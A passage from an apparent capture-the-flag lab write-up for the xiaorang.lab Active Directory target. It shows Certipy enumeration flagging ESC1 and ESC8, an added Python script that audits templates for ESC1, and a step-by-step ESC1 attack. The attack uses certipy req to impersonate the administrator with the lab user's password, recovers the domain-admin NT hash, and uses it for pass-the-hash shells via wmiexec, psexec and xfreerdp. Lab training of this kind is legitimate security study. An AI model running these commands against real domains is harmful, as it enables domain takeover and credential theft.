        Full Control Principals         : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
        Write Owner Principals          : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
        Write Dacl Principals           : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
        Write Property Enroll           : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Domain Users
                                          XIAORANG.LAB\Enterprise Admins
    [+] User Enrollable Principals      : XIAORANG.LAB\Domain Users
                                          XIAORANG.LAB\Authenticated Users
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.
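The template block above lists every setting that makes ESC1 possible (enrollee-supplied subject, a client-authentication EKU, no manager approval, zero required signatures, enrollment rights for Domain Users / Authenticated Users), and the CA block shows web enrollment over HTTP (ESC8). The following added example, which is neither the writeup's nor Certipy's code, parses an excerpt of that output and applies those conditions, so an administrator can check a template export against the ESC1 conditions and see that changing a single flag clears the finding. The excerpt embedded in the code is copied from the lab output above; the set of principals treated as low-privileged is an assumption.

```python
"""Auditing a certificate template for ESC1 and a CA for ESC8.

Added example, not the writeup's or Certipy's code. It parses the
indented 'Key : Value' layout of `certipy find -stdout` and applies the
ESC1 conditions shown in the template block above. The principals treated
as low-privileged are an assumption for the demo.
"""

LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

# Excerpt copied from the lab output above (template and CA sections).
TEMPLATE_TEXT = """\
    Template Name                       : XR Manager
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : XIAORANG.LAB\\Domain Admins
                                          XIAORANG.LAB\\Domain Users
                                          XIAORANG.LAB\\Enterprise Admins
                                          XIAORANG.LAB\\Authenticated Users
"""

CA_TEXT = """\
    CA Name                             : xiaorang-XIAORANG-DC-CA
    Web Enrollment
      HTTP
        Enabled                         : True
      HTTPS
        Enabled                         : False
"""


def parse_certipy_block(text):
    """Turn the indented 'Key : Value' layout into {path: [values]}.
    Lines without a colon are section headers and become path prefixes
    (e.g. 'Web Enrollment/HTTP/Enabled'); lines without a colon that are
    indented deeper than the previous key continue that key's value list."""
    fields, stack, last_key, last_indent = {}, [], None, -1
    for raw in text.splitlines():
        if not raw.strip():
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        if ":" in raw:
            key_part, _, value = raw.partition(":")
            while stack and stack[-1][0] >= indent:   # leave sections we have outdented from
                stack.pop()
            last_key = "/".join([name for _, name in stack] + [key_part.strip()])
            last_indent = indent
            fields[last_key] = [value.strip()] if value.strip() else []
        elif last_key is not None and indent > last_indent:
            fields[last_key].append(raw.strip())       # multi-line value
        else:
            while stack and stack[-1][0] >= indent:
                stack.pop()
            stack.append((indent, raw.strip()))        # section header
            last_key = None
    return fields


def _principal(name):
    """'XIAORANG.LAB\\Domain Users' -> 'Domain Users'."""
    return name.split("\\", 1)[-1]


def _is_true(fields, key):
    return fields.get(key, [])[:1] == ["True"]


def audit_template(fields, low_priv=LOW_PRIV_PRINCIPALS):
    """ESC1 needs every condition below to hold at once; `hits` lists which do."""
    if not _is_true(fields, "Enabled"):
        return {"template": fields.get("Template Name", ["?"])[0], "esc1": False, "hits": []}
    enrollers = {_principal(p) for p in fields.get("Permissions/Enrollment Permissions/Enrollment Rights", [])}
    weak = sorted(enrollers & set(low_priv))
    eku = fields.get("Extended Key Usage", [])
    # An empty EKU list means the certificate is good for any purpose, client auth included.
    client_auth = _is_true(fields, "Client Authentication") or _is_true(fields, "Any Purpose") or not eku
    conditions = {
        "low-privileged principals can enroll (" + ", ".join(weak) + ")": bool(weak),
        "no manager approval required": not _is_true(fields, "Requires Manager Approval"),
        "no authorized signatures required": fields.get("Authorized Signatures Required", ["0"])[:1] == ["0"],
        "EKU allows client authentication": client_auth,
        "enrollee supplies the subject / SAN": _is_true(fields, "Enrollee Supplies Subject"),
    }
    return {"template": fields["Template Name"][0],
            "esc1": all(conditions.values()),
            "hits": [label for label, hit in conditions.items() if hit]}


def audit_ca(fields):
    """ESC8: web enrollment reachable over plain HTTP."""
    return {"ca": fields.get("CA Name", ["?"])[0], "esc8": _is_true(fields, "Web Enrollment/HTTP/Enabled")}


def hardened(fields):
    """The two settings whose change removes ESC1 from the lab template."""
    fixed = dict(fields)
    fixed["Enrollee Supplies Subject"] = ["False"]
    fixed["Requires Manager Approval"] = ["True"]
    return fixed


if __name__ == "__main__":
    template = parse_certipy_block(TEMPLATE_TEXT)
    for label, result in (("as found", audit_template(template)), ("hardened", audit_template(hardened(template)))):
        print(f"{result['template']} ({label}): ESC1={result['esc1']}; conditions met: {result['hits']}")
    print(audit_ca(parse_certipy_block(CA_TEXT)))
```

Run as a script it reports the lab template as ESC1 with all five conditions met, then shows that the hardened copy (no enrollee-supplied subject, manager approval required) still meets three of them but is no longer ESC1, which is the point of the check: either of those two flags on its own breaks the chain.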

Request a certificate from the XR Manager template while impersonating the domain administrator to obtain administrator.pfx, then use that certificate to get a TGT and the NTLM hash.

Note: add the CA hostname to your hosts file first, otherwise the request times out.

proxychains certipy-ad req -u 'liupeng@xiaorang.lab' -p 'fiAzGwEMgTY' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager'  -upn administrator@xiaorang.lab

Let's break this command down piece by piece so its purpose is clear:

proxychains certipy-ad req \
    -u 'liupeng@xiaorang.lab' \
    -p 'fiAzGwEMgTY' \
    -target 172.22.9.7 \
    -dc-ip 172.22.9.7 \
    -ca "xiaorang-XIAORANG-DC-CA" \
    -template 'XR Manager' \
    -upn administrator@xiaorang.lab

  • proxychains
    → Routes all traffic through the proxy (usually SOCKS5, common in HTB/CTF setups) so that the target DC is reachable.

  • certipy-ad req
    → Certipy's certificate request module, used to ask a CA for a certificate.

  • -u 'liupeng@xiaorang.lab'
    → The domain user account used to enroll. Here it is liupeng.

  • -p 'fiAzGwEMgTY'
    → That user's password.

  • -target 172.22.9.7
    → The host running the CA service (usually the DC / CA server).

  • -dc-ip 172.22.9.7
    → The DC IP, used for LDAP queries and authentication so that local DNS failures do not get in the way.

  • -ca "xiaorang-XIAORANG-DC-CA"
    → The name of the Certificate Authority (CA) to use.

    This name comes from the certipy find enumeration.

  • -template 'XR Manager'
    → The certificate template.
    If the template is misconfigured (for example, it lets the requester choose the UPN), this is what makes the privilege escalation possible.

  • -upn administrator@xiaorang.lab
    The key point: this tells the CA that the certificate should be bound to the identity of the domain administrator, administrator.
    If the template is insecure, the CA issues a certificate that can impersonate the administrator.


With the low-privileged domain user liupeng, you connect through the proxy to the DC 172.22.9.7 and submit a certificate request to the domain CA xiaorang-XIAORANG-DC-CA.
Instead of requesting a certificate for yourself, you abuse the insecure configuration of the XR Manager template to request one belonging to administrator@xiaorang.lab.

⚡ If the request succeeds, you hold the domain administrator's PFX certificate and can:

  • export and load the certificate

  • authenticate via Kerberos and obtain a TGT (a domain admin ticket) directly

  • log in to the DC over RDP/WinRM, which amounts to domain admin privileges


👉 In one sentence:
This command abuses an AD CS template misconfiguration to have the ordinary user liupeng "request" a certificate for administrator; once it succeeds, you can impersonate the domain admin.

proxychains certipy-ad auth -pfx administrator.pfx -dc-ip 172.22.9.7

This command is Certipy-AD's authentication feature; paired with the domain admin certificate (administrator.pfx) requested earlier, it completes the "impersonate the domain admin" logon.


  • proxychains
    → Still sends traffic through the proxy (so the HTB/internal DC is reachable).

  • certipy-ad auth
    → Certipy's authentication module. It uses the certificate (PFX file) to authenticate to the DC and obtain a Kerberos TGT / NT hash and similar credentials.

  • -pfx administrator.pfx
    → The certificate file (private and public key) obtained earlier with req; effectively the domain admin's "ID card".

  • -dc-ip 172.22.9.7
    → Which DC to talk to, avoiding DNS resolution failures.


  1. Certipy uses the administrator.pfx certificate to authenticate to the KDC (the DC).

  2. If that succeeds, the DC treats you as administrator@xiaorang.lab.

  3. The tool outputs:

    • the NT hash (effectively the domain admin's password hash)

    • or a TGT (Ticket Granting Ticket) that can be imported and used to access services

  4. With those credentials you can:

    • Pass-the-Hash / Pass-the-Certificate

    • log in remotely over RDP, SMB, WinRM, etc.

    • continue lateral movement


  • Turn the certificate into a hash and log in with impacket:

    proxychains certipy-ad auth -pfx administrator.pfx -dc-ip 172.22.9.7 -username administrator -domain xiaorang.lab
    
    Once the NTLM hash is printed, you can use:

    proxychains psexec.py administrator@172.22.9.7 -hashes :<NT_HASH>

  • Use the Kerberos TGT directly and inspect it with klist:

    export KRB5CCNAME=administrator.ccache
    klist
    
  • RDP login (with the credentials obtained via the certificate):

    proxychains xfreerdp /u:administrator /d:xiaorang.lab /pth:<NT_HASH> /v:172.22.9.7
    

In one sentence
This command authenticates to the DC with the forged administrator.pfx certificate and obtains the domain admin's "ticket in" (a hash or a Kerberos TGT), effectively making you the domain admin.


Domain admin hash obtained

'administrator@xiaorang.lab': aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80

Pass-the-hash with the domain admin hash

proxychains wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/Administrator@172.22.9.26 -codec gbk
proxychains wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7 -codec gbk
# Either of these gives a shell directly

type Users\Administrator\flag\flag03.txt

type Users\Administrator\flag\flag04.txt

References:

https://www.cnblogs.com/fdxsec/p/17973370

https://fushuling.com/index.php/2023/10/06/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7certify/